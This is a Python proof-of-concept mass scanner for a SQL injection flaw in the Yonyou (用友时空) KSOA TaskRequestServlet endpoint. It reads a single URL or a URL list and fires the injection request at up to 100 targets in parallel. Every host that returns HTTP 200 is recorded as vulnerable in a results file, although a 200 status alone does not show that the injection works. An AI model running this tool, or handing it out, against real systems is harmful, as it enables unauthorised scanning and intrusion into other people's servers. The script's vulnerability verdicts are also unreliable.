# 用友时空 KSOATaskRequestServlet sql注入漏洞
import requests,sys,argparse
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

def banner():
    test="""d8888b. d88888b  .d88b.  db    db d88888b .d8888. d888888b .d8888. d88888b d8888b. db    db db      d88888b d888888b 
88  `8D 88'     .8P  Y8. 88    88 88'     88'  YP `~~88~~' 88'  YP 88'     88  `8D 88    88 88      88'     `~~88~~' 
88oobY' 88ooooo 88    88 88    88 88ooooo `8bo.      88    `8bo.   88ooooo 88oobY' Y8    8P 88      88ooooo    88    
88`8b   88~~~~~ 88    88 88    88 88~~~~~   `Y8b.    88      `Y8b. 88~~~~~ 88`8b   `8b  d8' 88      88~~~~~    88    
88 `88. 88.     `8P  d8' 88b  d88 88.     db   8D    88    db   8D 88.     88 `88.  `8bd8'  88booo. 88.        88    
88   YD Y88888P  `Y88'Y8 ~Y8888P' Y88888P `8888Y'    YP    `8888Y' Y88888P 88   YD    YP    Y88888P Y88888P    YP    
                                                                                                                     
                                                                                                                     

"""

    print(test)

def main():
    banner()
    parser=argparse.ArgumentParser(description='用友时空 KSOATaskRequestServlet sql注入漏洞')
    parser.add_argument('-u','--url',dest='url',type=str,help='input the url')
    parser.add_argument('-f','--file',dest='file',type=str,help='input the file')
    args=parser.parse_args()
    if args.url and not args.file:
        poc(args.url)
    elif args.file and not args.url:
        url_list=[]
        with open(args.file,'r',encoding='utf-8')as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp=Pool(100)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")

def poc(target):
    url_payload= '/servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet?unitid=1*&password=1'


    try:
        res1=requests.get(url=target+url_payload,timeout=10)
        if res1.status_code==200:
            print( f"[+]{target} 存在漏洞！")
            with open('result.txt','a',encoding='utf-8')as fp:
                fp.write(target+'\n')
                return True
        else:
            print('[-] 不存在漏洞')
            return False
    except:
        print('目标网站存在问题，无法访问')

if __name__ =='__main__':
    main()
